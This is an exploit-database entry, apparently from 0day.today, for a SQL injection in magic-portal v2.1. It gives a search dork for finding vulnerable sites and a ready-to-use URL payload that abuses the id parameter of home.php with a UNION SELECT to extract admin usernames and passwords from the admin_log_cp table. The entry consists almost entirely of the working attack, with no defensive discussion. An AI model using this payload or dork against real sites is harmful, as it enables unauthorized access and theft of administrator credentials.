id: 10714
date: 01/23/2010
title: magic-portal v2.1 SQL Injection Vulnerability
author: alnjm33
cves: 

=============================================
magic-portal v2.1 SQL Injection Vulnerability
=============================================

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title :magic-portal SQL injection Vulnerability
Author: alnjm33
Software Link:
Version:  2.1
Tested on: Version 2.1
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
                        ( Powered by magic-portal Version 2.1 )
================================Exploit=============================================
http://server/home.php?id=-2/**/union/**/select/**/1,concat(username_admin,0x3a,password_admin),3,4/**/from/**/admin_log_cp--
 
=======================================================================================



#  0day.today [2023-03-24]  #